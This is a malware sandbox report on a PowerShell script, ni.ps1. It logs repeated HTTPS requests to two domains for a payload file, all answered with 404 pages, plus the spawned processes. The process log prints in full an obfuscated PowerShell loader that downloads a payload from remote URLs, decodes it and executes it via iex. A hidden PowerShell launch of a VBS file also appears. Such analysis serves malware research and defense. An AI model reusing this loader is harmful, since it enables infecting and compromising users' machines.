                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.549910184.171.244.2314432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:39:40 UTC81OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.almrwad.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:39:41 UTC164INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 09:39:41 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    2024-12-05 09:39:41 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.549922148.251.114.2334432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:39:46 UTC90OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.erp-royal-crown.info
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:39:47 UTC238INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Thu, 05 Dec 2024 09:39:46 GMT
                                                                    server: LiteSpeed
                                                                    2024-12-05 09:39:47 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                    2024-12-05 09:39:47 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.549937184.171.244.2314432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:39:52 UTC81OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.almrwad.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:39:52 UTC164INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 09:39:52 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    2024-12-05 09:39:52 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.549952148.251.114.2334432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:39:58 UTC90OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.erp-royal-crown.info
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:39:59 UTC238INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Thu, 05 Dec 2024 09:39:58 GMT
                                                                    server: LiteSpeed
                                                                    2024-12-05 09:39:59 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                    2024-12-05 09:39:59 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.549965184.171.244.2314432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:40:04 UTC81OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.almrwad.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:40:04 UTC164INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 09:40:04 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    2024-12-05 09:40:04 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.549981148.251.114.2334432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:40:10 UTC90OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.erp-royal-crown.info
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:40:10 UTC238INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Thu, 05 Dec 2024 09:40:10 GMT
                                                                    server: LiteSpeed
                                                                    2024-12-05 09:40:10 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                    2024-12-05 09:40:10 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:04:38:05
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1"
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:1
                                                                    Start time:04:38:05
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:04:38:08
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'"
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:04:38:23
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs"
                                                                    Imagebase:0x7ff79b6f0000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:7
                                                                    Start time:04:38:24
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. CollsDabbnp uperl ,onriAdmistReas,(Gyroc$SubpoSTimaly ouchnA tindAadalsUnextbSvidueIldstk .rcae.hicqnDressdSla,ge Re.llDriftsLyskoeDaadynVur es U or)Bugg ');responsibly (Psykopaterne 'Discr[NondeN,ungeeAletht .nds.DeleaSBal,ueArketrShehivIrideiAliptcSynodeOverfPHandeoIlyusi BurenBj,intHnekyMNonsua isagn Cycaa utohgBartoeReendrf eda]Obser:Blurr:NulpuSMegaleSubclcCalorubronzr.hanti.eniltF,iery eavP LiftrUndeeoDragetRenteoTwi,ocTvenloProfelSejer P,str= ttr S.mme[ RegrNBuldeeCompatVener.Sukk,STh aseBealtcMar euepir,r VsbeisindetRumleyUnmirP IronrNo,deoA,hngtTrskeoDistac Udrro,adaylFir,cTfl.etyUnderpHearteMalaw]Dtres:,ifto: lkicTGa,ralNu,mesMudfl1Pante2Mainl ');$Orloven=$Crackajack[0];$Immuniseringer= (Psykopaterne 'forpl$ agakg VanvlSuspeo,nindbUnsecaInjurl Slav:Lsl dS Miliq Formu Va.ea Ch.il Drjhl PosteSnerprSolta=PlayrNBehole Re,iwKrag,-FlaggO rotbPulvejtabiaeBe,eacSkakstUds i Ye.rbSKininyMyatrsOb,eqt Bl,keCaesam epr.DeparN ,rojepredotSnedk.RetsaW KajaeNapkibOutsiCChl,rlSuba.i selveWatapn yelt');$Immuniseringer+=$Boere[1];responsibly ($Immuniseringer);responsibly (Psykopaterne ' Ren,$BrndsSEft,rqSkambuLil,ia RamtlAfterlDelage LeverModul. BergH Ken,eInspea VenddMdeafeUb,harAmarysScab,[Eremi$ BellHSpeciiEnedir ankf]Guldm= Stvk$prefiSUnletkmolluoSkrfnv TelttArcharTipsfeWhuzkr MagnnUdetje FikssS eka ');$Syndromic=Psykopaterne 'Twini$UvisnSSeitfqhyggeuPara,aKoo dlB,lsal,alose harmrHvsse.Un,waDLeonao ge fw DiabnMaconlBagtaoKompraTiltbd .limFdidasiRiposlVsenseMyr a(Menne$ OrieOOverfrDiskulSkjoroTimidvTaalteUdru nImpas, Spir$ScyppGRe,rieDishon fodheGookscPiluloR,ncilDruseo,ulemg VideiGstgicMiskra StanlPrlimlShellyFi,tr1 utcr4Attri9Prear) Mone ';$Genecologically149=$Boere[0];responsibly (Psykopaterne 'Eperv$De oyg Metal forho UtydbSlariaRaahulEngra: And.P PipirRadixeFien,pNonoprTowl.o FrisvFinanoBetynkBuntiePermidche s=.kken(AnthrTRe toe JurisCochltIndda-NonbuPSuperaOn.idtRockrhEpi l Ke s$aandeGK,rtoe.ominncolibeSupercAnd.tojobmulKonseoWorsegAntroi trancSaddlaSkvallDy.phlBankrySolid1 Ung.4Stenk9 Kard)Sonn. ');while (!$Preprovoked) {responsibly (Psykopaterne 'Cel,b$Race gG.rerl Tolbo PeribCroo.aToc al raft: .ifeCPeache WiglnInopetLig,rrStanciTupmasBeribt UdstiMetacsSammekAdmiseDemiw= S,li$Endevt,hasirFrugtuFormeeThund ') ;responsibly $Syndromic;responsibly (Psykopaterne 'AuktiS UrsitRestaa,osperSyntht F er-FilmiSKamsmlborgee Zar,e overpSkimm Rec o4Lings ');responsibly (Psykopaterne 'Onrus$ ,ejrgMimidlFaldeoBenytbB.ndaaCongrl ,rim:SolomPBagderPrio.eVrkmepwi nerRepugo.utinvAperioG.melkDys.ce Gal,d Iber=Bukni(appelTFormkeSpandsTortutAabni-fructP wasaa GonatTrysah Nord Regal$ istGE.gareEnchonCan,geTronsc FrdioDrg.ilskattoMat,hgOpdrtiDisalcAktivaParkelUdsm lModsty Pre 1Backw4Under9 Na,i) Konv ') ;responsibly (Psykopaterne ' Bee.$ yperg,iplal emato As,ebH,steaHepatlM.red:MandsLB,saaiT,ackn PredjNon.aeElselts,atteO,gragK llen Gli iG sponM rosgBesposLsegr=Afhng$Ga,leg MelllFrithoWosombTillia tayslWhi p: RadiIUdviknDryptgvis,rrBe vaipantnd Subr1Glot,3Skrun0Cultu+Udtry+ B,pi%Edvi.$Kur bCUnsparF.stlaForsac LsepkFinanaAfsvajIodocaTemp,cTaksok Phyl.MiliecUdm.to InfouRuttinTusint Arge ') ;$Orloven=$Crackajack[$Linjetegnings];}$Araliaceae=290259;$Miljkvalitetsplanlgningers=29639;responsibly (Psykopaterne 'Natio$Omdb gSoleslapp ioGourmbAnimaa TrivlLsefa:AlterPKlknioErstasSlumbtCountoDomflf.ommafUnderiAlterc I dbeKonto1Udfyl6Etymo9 Micr Cont=Skuff LametGG,dmueReligt ,mor-GrftnCPhotooCollinTeo,otPigmee.unjanGreyltD,bit D.ops$ .verGAtticeFri,enMotoremuskecL,jemoRegnil Tango S,argNorthiLselacAirifaUngdolSejerlJudi yurb,n1Acros4Pha.o9Overd ');responsibly (Psykopaterne 'silen$B,vgegProsolRiddeoBr,llbyokepa.algrlUndis:UnnapUWahidrShipreKombitOverghvalidrBrudsoMilitsaconit AbhoaR,prix,nteri D.tos Indf Baand=Unecs Yelli[StrenS.snoby Tomms duest enneeGoka.m Synk.GrinnCEdmunoU.dernLotu.vHygroeParejrUnchatNucle]Softe:Ordfr:CorpoFAttrarTota,ofr.dem esigB oncoaLandssSkalpePaa t6Upa.t4.olypSnonblt Lo,irJapaniDenunnStategAbacn(lockh$LauraPByrdeoCap is f akt P,aloOve.bfshogufhyp piFolkecSpendeTusay1Winte6Udsta9M,nha),teno ');responsibly (Psykopaterne 'Diffe$D kregBagerlVitrio Tungb ProsaU sanlInds,: GunsPEj.ndealfierNatalsMym.reUltracFormeuUn.artPrenaeo,onodV,ren Bleac=Mi be Procu[ sin SRooftyGhostsCamsht S.epeilbudmFulme..nplaT C,anePeracxIndvetSoedm. ictaENonsyn W,ldc aissoRequadkidnai Agr,nFevergOmpro] sept:Indst:linjeASt liSMedieCEjendIA.klaI Jitt.BibraGSli keRykketNota SDismatA mbrr ,proiPigt.nimporgQuarr(Droge$ TilrUVermir AnsgeMyelotBre.th,unstrmontao Grins U,retForesaAntinxPoteniG anasGenbr)Welle ');responsibly (Psykopaterne ' Aest$KumpagregenlUroceoBrisabPinliaSlettl Scar:.krudK eneto ForansikkevOp ageIllegn ReintStrop=P.nce$SaproPAfspae Bewrr.tomssBrutteEftercStranuperistPrecie,patldDyrke.Beskys uchfu ikrbgenersJovict Unl rpaal,iForlon relsgNr,ed( Anti$ansaeA.vmmer ,dveaCa.ill loseiAnaesaSleepcFaiteeSyncoa Pecheerran,A,std$ChansMAffrii BratlMa,hejAflbskHorotvToleraS temlTokr.istrobtBriefestr ttUdstysOrchepBam ul U deaInkvin Shu lC.nchg Cab.nStegeiTudesnDros gI.hereDe ucrNo.spsParac) Abol ');responsibly $Konvent;"
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:8
                                                                    Start time:04:38:24
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:9
                                                                    Start time:04:38:25
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ahorntr.Pib && echo t"
